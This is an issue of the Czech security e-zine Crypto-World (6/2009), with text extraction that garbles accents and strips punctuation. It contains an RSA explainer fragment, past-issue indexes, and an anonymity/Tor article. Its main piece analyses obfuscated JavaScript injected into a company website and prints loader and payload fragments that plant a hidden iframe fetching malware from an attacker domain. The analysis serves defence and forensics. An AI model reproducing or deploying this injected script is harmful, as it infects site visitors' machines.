nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 2: Sešit 6/2009 (452 kB)

Crypto-World 62009

2

A Vyacuteprava za obsahem javascriptu Jaroslav Vorliacuteček (jerry at cybercave dot cz) Jakub Suchyacute (info at jsuchy dot cz) Uacutevod Jeden z velmi nebezpečnyacutech počiacutetačovyacutech myacutetů současneacute doby je že škodlivyacute koacuted se nachaacuteziacute vyacutehradně na straacutenkaacutech silně eroticky laděnyacutech přiacutepadně straacutenkaacutech poskytujiacuteciacutech warez a jinyacutech podobnyacutech Předpoklaacutedaacutem že většina kolegů už zažila nesčetněkraacutet argumentaci klientů o nenavštěvovaacuteniacute zaacutevadnyacutech straacutenek a překvapeniacute nad zjištěniacutem existence havěti šiacuteřeneacute z webovyacutech straacutenek Bohužel se havěť nachaacuteziacute již i na straacutenkaacutech ktereacute majiacute daleko do zaacutevadneacuteho obsahu Nedaacutevno jsem pomaacutehal kolegovi Jakubovi Sucheacutemu s analyacutezou malware nalezenyacutem na internetovyacutech straacutenkaacutech jedneacute maleacute českeacute firmy Bylo prvniacuteho dubna 2009 a předpoklaacutedaacutem že jsem nebyl saacutem v pohotovosti ohledně červa Conficker Lehce po poledni mi napsal Kuba zdali bych nepomohl s jedniacutem javascriptem co našel Prvotniacutem impulsem ke zkoumaacuteniacute bylo že se antivir začal hlaacutesit po naacutevštěvě straacutenek Jelikož se Conficker neprojevoval a toto vypadalo na velmi zajiacutemavyacute reacutebus k řešeniacute pustil jsem se do analyacutezy Analyacuteza hlavičky javascriptu Analyacuteza byla provedena v prostřediacute uzpůsobeneacutem k analyacuteze havěti Pokud byste chtěli kroky po mně opakovat prosiacutem provaacutedějte tak v prostřediacute kde nehroziacute šiacuteřeniacute viroveacute infekce a naacutestroji ktereacute zaručiacute že se Vaacutem havěť nevymkne z rukou a neovlaacutedne Vaši siacuteť Nyniacute již k analyacuteze javascriptu Uprostřed php straacutenky byl vložen koacuted (kompletniacute koacuted je uveden v [13] přiacuteloha 1 bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo) kteryacute začiacutenal takto ltscript type=textjavascriptgtvar jj=window[StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108)](StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108)) jj(x66x75x6ex63x74x69x6fx6ex20x63x56x55x69x31x47x28x62x41x68x59x29x7bx66x75x6ex63x74x69x6fx6ex20x62x44x67x34x28x6bx6fx7ax29x7bx76x61x72x20 Na prvniacute pohled to vypadaacute jako javascript kteryacute se maacute před něčiacutem nebo někyacutem ukryacutet Stroji tento koacuted nevadiacute ale tato toto skrytiacute nebo zamlženiacute (anglicky obfuscation) ztěžuje porozuměniacute koacutedu s ciacutelem vyhnout se detekci antivirů Prvniacute čaacutest javascriptu - window[StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108)](StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108) - aacute ve skutečnosti window[eval](eval) Funkce val vyhodnotiacute řetězec danyacute jako parametr a spustiacute ho jako javascriptovyacute koacuted Znaky začiacutenajiacuteciacute x66 jsou pouze ASCII nebo Unicode znaky zapsaneacute hexadecimaacutelně Neviacutem zda se nepohybuji pouze na škodlivyacutech straacutenkaacutech ale většinou když naraziacutem na funkci eval nebo unescape tak byacutevajiacute spojeny s nekalyacutem koacutedem kteryacute zneužiacutevaacute zranitelnostiacute Internet Exploreru a stahuje havěť do počiacutetače

Crypto-World 62009

3

Ze zkušenosti doporučuji nerozebiacuterat škodlivyacute koacuted na platformě pro kterou je určen Zaacutesadně provaacutediacutem analyacutezu malware pro Windows na Linuxu a obraacuteceně K analyacuteze zamlženeacuteho koacutedu (anglicky obfuscated code) použiacutevaacutem v maximaacutelniacute miacuteře automatickeacute naacutestroje nebo skripty Z velmi prosteacuteho důvodu - šetřiacute to čas Analyacuteza zdrojoveacuteho koacutedu javascriptu Uklaacutedaacutem zamlženyacute (angl obfuscated) řetězec do souboru payload a zjišťuji co je ukryteacute uvnitř Jeden linuxovyacute přiacutekaz - cat payload | perl -pe sx()chr(hex($1))ge - rozkoacutedoval payload do čitelnějšiacute podoby ltscript type=textjavascriptgt function cVUi1G(bAhY) function bDg4(koz) var gXARrbV=0 var abt=kozlength zKpOXd=0 (kompletniacute koacuted je uveden v [13] přiacuteloze 2 bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo) Rozloženyacute koacuted již vypadaacute daleko čitelněji než původniacute forma a lze odhadovat co dělaacute Celyacute skript se tak sklaacutedaacute ze dvou čaacutestiacute Prvniacute je již čitelnyacute koacuted kteryacute provede prvniacute rozkrytiacute koacutedu (anglicky de-obfuscation) a druhou čaacutestiacute je nejzajiacutemavějšiacute čaacutest javascriptu - vlastniacute (v tuto chviacuteli jsem předpoklaacutedal) maligniacute koacuted Před rokem a půl uacutetočniacutekům většinou stačil pouhyacute unescape k vyhnutiacute se detekci antivirovyacutech programů nicmeacuteně od teacute doby se vyvinuly jako metody detekce tak metody skryacutevaacuteniacute Rozkoacutedovat řetězec nebylo žaacutednyacute probleacutem ale bohužel neobsahoval žaacutedneacute čitelneacute čaacutesti Důvod je jednoduchyacute Vnitřniacute koacuted je zašifrovanyacute jednoduchou šifrou Pokusiacutem se popsat co danyacute koacuted znamenaacute function dsWV7(fE7uydQbss) return fE7uycharCodeAt(dQbss) vraacutetiacute z řetězce fE7uy znak na pozici dQbss function bDg4(koz) var gXARrbV=0 var abt=kozlength zKpOXd=0 while (zKpOXdltabt) gXARrbV+=dsWV7(kozzKpOXd)abt zKpOXd++ return (gXARrbV+) zpracuje řetězec koz a vynaacutesobiacute součet ASCII hodnot v řetězci deacutelkou řetězce Vlastniacute dešifrovaciacute koacuted vypadaacute takto var dkm7Gx=eval(a_r0gu_m+e0nt1s++c1a+l_le_e+replace([0_1+]g )) v dkm7Gx je odkaz na vlastniacute funkci k umožněniacute rekurze k4Rca= xF7S=0 r6bZl=0 var tIu6Ye=(new String(dkm7Gx))replace([^a-z0-9A-Z_-]g)

Crypto-World 62009

4

Niacuteže koacuted jsem nebyl schopen rozluštit bez spuštěniacute v chraacuteněneacutem prostřediacute (Sandbox) var xwjC=bDg4(tIu6Ye) bAhY=unescape(bAhY) lt- v bAhY je nyniacute uložen obfuskovanyacute koacuted v binaacuterniacute podobě for(var lJQZh=0 lJQZh lt (bAhYlength) lJQZh++) var bFKWW=dsWV7(tIu6YexF7S)^dsWV7(xwjCr6bZl) var uF0=dsWV7(bAhYlJQZh) xF7S++r6bZl++ k4Rca+=StringfromCharCode(uF0^bFKWW) if(r6bZlgtxwjClength)r6bZl=0 if(xF7SgttIu6Yelength)xF7S=0 Jako kliacuteč k dešifrovaacuteniacute se použiacutevaacute kliacuteč bFKWW kteryacute je ziacuteskaacuten jako XOR znaků ziacuteskanyacutech z prostřediacute v průběhu vykonaacutevaacuteniacute javascriptu Otevřenyacute text je poteacute ziacuteskaacuten jako šifrovanyacute text XOR kliacuteč Metoda šifrovaacuteniacute nebyla hlavniacutem ciacutelem paacutetraacuteniacute je to pouze zajiacutemavost nebo překaacutežka kterou je třeba překonat Daacutel už se bez znalosti prostřediacute ve ktereacutem je javascript spuštěn nedalo pokračovat Na řadu přišel experiment v chraacuteněneacute laboratoři Vlastniacute skrytyacute koacuted Javscript jsem krokoval v Microsoft Script Editoru a po chviacuteli jsem ziacuteskal teď již kompletniacute koacuted function ascgpELkf() ascgpELkfprototype = getFrameURL function() var dlh=documentlocationhost return http+ + ((dlh == || dlh == undefined) thisgetRandString() ) + dlhreplace ([^a-z0-9-])replace (+) + + thisgetRandString() + + thispath + thishost hostqqcn pathf+q+StringfromCharCode(119)+e+r+new String(z)+StringfromCharCode(46)+new String(c)+new String(n) (uveden v [13] přiacuteloze 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo) Celeacute toto sloužiacute k instalaci koacutedu ze straacutenek uacutetočniacuteka anebo k vloženiacute naacutesledujiacuteciacuteho koacutedu do dokumentu kteryacute se vykonaacute při zobrazeniacute straacutenky Vloženyacute koacuted do straacutenky je naacutesledujiacuteciacute ltdiv style=displaynonegtltiframe src=httpAAXXXYczb7d4677a720fcd24fqwerzcnqqcngt ltiframegtltdivgt AAAXXXCZ je URL ze ktereacute byla tato straacutenka volaacutena b7d4677a720fcd24 je naacutehodneacute čiacuteslo Pokud se skript vykonaacute pak uacutetočniacutekovi na domeacuteně fqwerzcn (IP 21211718534) je odeslaacuten naacutesledujiacuteciacute HTTP požadavek GET qqcn HTTP11 Accept imagegif imagex-xbitmap imagejpeg imagepjpeg applicationx-shockwave-flash Referer httpAAXXXYcztesthtml Accept-Language en-us Accept-Encoding gzip deflate User-Agent Mozilla40 (compatible MSIE 60 Windows NT 51 SV1) Host AAXXXYczb7d4677a720fcd24fqwerzcn Connection Keep-Alive

Crypto-World 62009

5

Vyacutepis z whois pro IP adresu 21211718534 inetnum 2121171850 - 212117185255 netname RUSTELEKOM descr Rustelekom LLC country RU Analyacuteza malware Pokud fqwerzcnqqcn otevřete pak se Vaacutem do počiacutetače staacutehne vcelku slušneacute množstviacute havěti Zajiacutemaveacute na straacutence uacutetočniacuteka je že je zde implementovaacuten mechanizmus sledovaacuteniacute kdo jakeacute přiacutekazy posiacutelaacute a zdaacute se že maacute oběť dva pokusy na ziacuteskaacuteniacute infekce Poteacute dojde na nějakyacute čas k zablokovaacuteniacute pravděpodobně IP adresy Je možneacute že se takto uacutetočniacutek braacuteniacute analyacuteze provozu nebo se pouze snažiacute šetřit siacuteťovyacute provoz Bohužel toto velmi znesnadňuje analyacutezu a opakovaacuteniacute pokusu Po otevřeniacute ve virtuaacutelniacute laboratoři stouplo vytiacuteženiacute procesoru laboratoře na 100 a do dvou minut laboratoř havarovala se zobrazeniacutem modreacuteho šetřiče obrazovky Poteacute jsem již stanici nespouštěl do Windows ale provedl jsem boot do dřiacuteve volně dostupneacuteho naacutestroje pro forenzniacute analyacutezu ndash Helix CD Vytvořil jsem MD5 hash (odborniacuteci prominou) všech souborů na disku a dal se do zjišťovaacuteniacute změn porovnaacuteniacutem originaacutelniacutech souborů se změněnyacutemi Každyacute zjištěnyacute přidanyacute nebo změněnyacute soubor jsem nahraacutel na virustotalcom abych zjistil jak se k němu postaviacute jednotliveacute antiviroveacute systeacutemy Vyacutesledky jsou vcelku zajiacutemaveacute doporučuji je shleacutednout v [13] přiacuteloze 4 ndash bdquoVyacutesledky antivirovyacutech kontrolldquo

Zdroj infekce

V okamžiku kdy bylo zjištěno co danyacute javascript znamenaacute pustili jsme se s Kubou do zjištěniacute kde se vlastně na straacutenkaacutech objevil a odkud Podařilo se naacutem kontaktovat administraacutetora a ziacuteskat logy z web serveru V logu přiacutestupů jsme objevili mnoho zaacuteznamů o přihlaacutešeniacute na FTP z adres z Čiacuteny Zajiacutemavyacutem zjištěniacutem bylo že jsme našli pouze uacutespěšnaacute přihlaacutešeniacute čili uacutetočniacutek odněkud ziacuteskal platneacute uživatelskeacute jmeacuteno a heslo Paacutetrali jsme zdali existuje vir kteryacute krade hesla do FTP a našli jsme jich několik Předpoklaacutedaacuteme že počiacutetač administraacutetora straacutenek byl dřiacuteve infikovaacuten virem jehož ciacutelem bylo ziacuteskat přiacutestupy na FTP uacutečty ndash napřiacuteklad viry Virut nebo Neosploit Bohužel paacutetrat zpětně v čase jakyacute vir byl na stanici několik měsiacuteců zpět nepřineslo žaacutednyacute vyacutesledek

Poteacute jsme takeacute zjišťovali co se změnilo na FTP uacutečtu a našli jsme že pro danou domeacutenu byl do každeacuteho existujiacuteciacuteho php a js souboru vložen škodlivyacute javascript

Zaacutevěr

Po prohleacutednutiacute exploitů bych doporučil na klientskyacutech počiacutetačiacutech miacutet staacutele aktualizovaneacute Windows použiacutevat firewall zajistit nainstalovanyacute a aktuaacutelniacute antivirovyacute systeacutem s aktuaacutelniacute antivirovou databaacuteziacute při pohybu po internetu použiacutevat prohliacutežeč Firefox s nainstalovanyacutem NoScript pluginem Takteacutež bych nedoporučoval použiacutevaacuteniacute automaticky funkci pamatovaacuteniacute hesel miacutesto toho by bylo vhodneacute použiacutet password managery jako je napřiacuteklad Keepass

Crypto-World 62009

6

Z pohledu administraacutetora serveru by bylo vhodneacute aby klienti přestali použiacutevat FTP protokol pro update straacutenek a tento nahraacuteli SCP nebo FTPS Přiacutestup na server by měl byacutet omezen pouze pro nezbytně nutnyacute rozsah IP adres Rozsahy IP adres pouze pro Českou Republiku a Slovensko Kuba zveřejnil na sveacutem blogu [12] Administraacutetoři by si takteacutež měli zajistit vynuceniacute změny FTP hesla po přibližně 90-ti dnech

Odkazy

[1] Obfuscation - httpenwikipediaorgwikiObfuscated_code [2] Sandbox analyacuteza javascriptu umiacutestěneacuteho ve straacutence httpwepawetiseclaborgviewphphash=63e61b9084ca87248668eb83c9aa5742amptype=js [3] Referenčniacute přiacuteručka Javascript ndash httpsdevelopermozillaorgenCore_JavaScript_15_Reference [4] Analyacuteza javascriptů na Internet Storm Center ndash httpiscsansorgdiaryhtmlstoryid=4246 httpiscsansorgtaghtmltag=javascript [5] Microsoft Script Editor guide - httperikeaenetarchives20050704214950 [6] Českeacute a Slovenskeacute rozsahy IP adres httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [7] Dancho Danchevs blog - httpddanchevblogspotcom [8] Informace o Neosploit httpsecurityworldczsecurityworldutocnici-ziskali-pristup-k-200-000-serverum-a-nasadili-zde-neosploit-280 [9] Neosploit - přiacutepad z Českeacute Republiky httpwwwbenczczaktualitynas-web-byl-napaden-hackerem [10] Test souborů na vyacuteskyt virů ndash httpvirustotalcom [11] Helix3 tm ndash dřiacuteve dostupnyacute na httpwwwe-fensecom [12] Suchyacute J httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [13] Vorliacuteček J Suchyacute J Vyacuteprava za obsahem javascriptu

přiacuteloha k e-zinu Crypto-World 62009 Přiacuteloha 1 - bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo str1-6 Přiacuteloha 2 - bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo str7-9 Přiacuteloha 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo str10-11 Přiacuteloha 4 - bdquoVyacutesledky antivirovyacutech kontrolldquo str12-24

Crypto-World 62009

7

B Anonymita v globaacutelniacute siacuteti Ing Jan Hajnyacute Uacutestav telekomunikaciacute FEKT VUT Brno (hajnyfeecvutbrcz) Abstrakt ndash Hlavniacutem ciacutelem tohoto člaacutenku je popsat současnyacute stav tyacutekajiacuteciacute se ochrany privaacutetniacutech dat při použiacutevaacuteniacute informačniacutech systeacutemů a identifikovat zaacutekladniacute prostředky pro jejich ochranu V prvniacute čaacutesti jsou zmiacuteněny hlavniacute probleacutemy při využiacutevaacuteniacute současnyacutech informačniacutech technologiiacute a hrozby ktereacute naacutem mohou přineacutest Druhaacute čaacutest člaacutenku se věnuje jednomu z prvniacutech kroků při ochraně anonymity v počiacutetačovyacutech siacutetiacutech Jednaacute se o technologii Tor poskytujiacuteciacute možnost skrytiacute identity Osobniacute data a jejich využiacutevaacuteniacute

V současneacute době již plně žijeme v informačniacute společnosti tedy společnosti založeneacute na datech a jejich přenosu zpracovaacuteniacute Teacuteměř každyacute z naacutes využiacutevaacute osobniacute počiacutetač mobilniacute telefon kreditniacute karty či smart karty pro identifikaci v různyacutech organizaciacutech a uacuteřadech Neniacute však zcela zřejmeacute jakaacute data se ve skutečnosti pomociacute těchto přiacutestrojů přenaacutešiacute a kolik mohou řiacuteci o našem chovaacuteniacute a soukromiacute Nejsou to takeacute pouze zařiacutezeniacute kteraacute vlastniacuteme a kteraacute tak můžeme přiacutemo ovlivnit Jednaacute se i o tzv bezpečnostniacute zařiacutezeniacute všude kde se pohybujeme ndash např dohledoveacute kamery ve městech skenery na letišti biometrickeacute pasy nebo různeacute slevoveacute karty obchodniacutech řetězců Všechny tyto zařiacutezeniacute mohou pracovat s našiacute identitou a my nejsme schopni přiacuteliš ovlivnit kolik informaciacute o naacutes uvolňujiacute Mnoho přiacutekladů může byacutet uvedeno např ze člaacutenků Bruce Schneiera kteryacute se problematikou ochrany identity zabyacutevaacute Ze člaacutenku zabyacutevajiacuteciacuteho se problematikou privaacutetniacutech dat [1] je jasneacute že se nejednaacute pouze o teoretickou hrozbu Přiacutekladem mohou byacutet dohledoveacute systeacutemy Jen v Londyacuteně je v současneacute době okolo 500000 dohledovyacutech kamer [2] I přesto z některyacutech vyacutezkumů vyplyacutevaacute [3] že jejich efektivita neniacute při odhalovaacuteniacute zločinů přiacuteliš vysokaacute Zatiacutemco mohou miacutet menšiacute vliv na přesunutiacute zločinnosti na jinaacute miacutesta v globaacutelnějšiacutem měřiacutetku se neprojeviacute Na druhou stranu jsou tyto systeacutemy v provozu 24 hodin denně a sniacutemajiacute všechny osoby na veřejnyacutech miacutestech S technologickyacutem vyacutevojem nejsme daleko od automatickeacuteho rozpoznaacutevaacuteniacute tvaacuteřiacute a tedy i identifikace osob na zaacuteznamech Budou o naacutes tedy znaacutema data tyacutekajiacuteciacute se našeho pohybu během dne chovaacuteniacute (např kde nakupujeme) a dokonce bude možneacute kamery zneužiacutet k ilegaacutelniacutemu sledovaacuteniacute osob v soukromyacutech bytech atd ktereacute jsou v dosahu kamer Stejně tak znaacuteme leteckeacute fotografie sloužiacuteciacute jako podklady k mapaacutem ndash dostatečně detailniacute na odhaleniacute mnoha informaciacute o soukromyacutech osobaacutech

Dalšiacutem přiacutekladem ohroženiacute identity jsou smart karty a jejich využiacutevaacuteniacute během běžneacute denniacute činnosti Neniacute složiteacute si uvědomit že někde musiacute existovat data o tom co během dne jiacuteme (zaměstnaneckeacute ID karty) nakupujeme v obchodech (kreditniacute karty) jakeacute maacuteme zvyky při naacutekupech např potravin (slevoveacutečlenskeacute karty) nebo o co se zajiacutemaacuteme (videopůjčovnyknihovny) Ve všech těchto přiacutepadech je jednoznačně spojena naše identita s našiacutem chovaacuteniacutem Vytvaacuteřiacute se tak jakyacutesi datovyacute otisk našiacute osobnosti i přesto že tyto data jsou rozprostřena u různyacutech organizaciacute a na různyacutech miacutestech

V některyacutech přiacutepadech dokonce můžeme uacutespěšně tvrdit že data o naacutes velice uacutezce ovlivňujiacute naše životy [4] Na zaacutekladě těchto informaciacute mohou instituce rozhodovat o tom zda dostaneme půjčku v bance zda dostaneme viacutezum do zahraničiacute či zda jsme dostatečně důvěryhodniacute pro sděleniacute tajnyacutech informaciacute Nepřiacutejemnyacutem faktem je že sděleniacute těchto dat si nijak neuvědomujeme a nemůžeme je tiacutem nijak ovlivnit stejně tak jako nemůžeme ovlivnit chyby ktereacute se můžou v těchto datech vyskytnout Jednoduše proto že ani neviacuteme kde jsou v současneacute době data uložena Jelikož se jednaacute o cenneacute informace jsou často prostředkem

Crypto-World 62009

8

obchodu např reklamniacutech agentur To je zřetelneacute při využiacutevaacuteniacute služeb jako je veřejnyacute email internetoveacute obchody vyhledaacutevaciacute naacutestroje či komunikačniacute naacutestroje (Facebook atd) kde je reklama zcela ciacutelenaacute podle toho jak danou službu využiacutevaacuteme Tato reklama je pak takeacute mnohem uacutečinnějšiacute tiacutem paacutedem jsou jejiacute zadavateleacute ochotni platit značneacute sumy za data o uživateliacutech

Jak bylo uvedeno u přiacutekladů z předchoziacuteho textu existuje při použiacutevaacuteniacute informačniacutech technologiiacute přiacuteliš hrozeb na to aby zůstala naše identita skryta Tato digitaacutelniacute identita je pak využiacutevaacutena při aktivitaacutech ktereacute již nemusiacute byacutet zcela v zaacutejmu uživatele Probleacutem je že v teacuteto faacutezi je teacuteměř nemožneacute takoveacuteto užiacutevaacuteniacute dat omezit či kontrolovat Důvodem neniacute až tak technologickaacute nemožnost jako neochota poskytovatelů těchto služeb umožňovat anonymnějšiacute prostřediacute V naacutesledujiacuteciacutem textu bude představen naacutestroj kteryacute může řešit prvotniacute probleacutem tyacutekajiacuteciacute se analyacutezy provozu v datovyacutech siacutetiacutech Je zde uveden jelikož se jednaacute o stavebniacute prvek využitelnyacute při uvedeniacute dalšiacutech technik ochrany anonymity uživatele v celosvětoveacute siacuteti a o prvek bez ktereacuteho by pokročilejšiacute techniky ztraacutecely smysl Adresace v IP siacutetiacutech

Prvniacute probleacutem kteryacute potřebujeme vyřešit v souvislosti se zvyacutešeniacutem anonymity v IP siacutetiacutech je adresace a směrovaacuteniacute Všechna posiacutelanaacute data jsou zapouzdřena do IP paketů viz Obr č 1

Obr č 1 Hlavička IP paketu Součaacutestiacute hlavičky těchto paketů je takeacute zdrojovaacute adresa a ciacutelovaacute adresa tedy jednoznačneacute identifikaacutetory původce komunikace a ciacutele komunikace V předchoziacute kapitole však byly popsaacuteny hrozby plynouciacute z možnosti identifikace komunikace Vidiacuteme že tedy již v naacutevrhu komunikačniacuteho protokolu TCPIP je jistyacute probleacutem braacuteniacuteciacute zvyacutešeniacute anonymity v globaacutelniacute siacuteti Existujiacute však řešeniacute kteraacute jsou již v současneacute době použiacutevaacutena a kteraacute mohou tento probleacutem uacutespěšně vyřešit Ziacuteskaacuteme tak protokol pro anonymniacute komunikaci kde z odchycenyacutech dat nepůjdou zjistit jejiacute uacutečastniacuteci Jedniacutem z těchto řešeniacute je onion routing [6] Onion routing

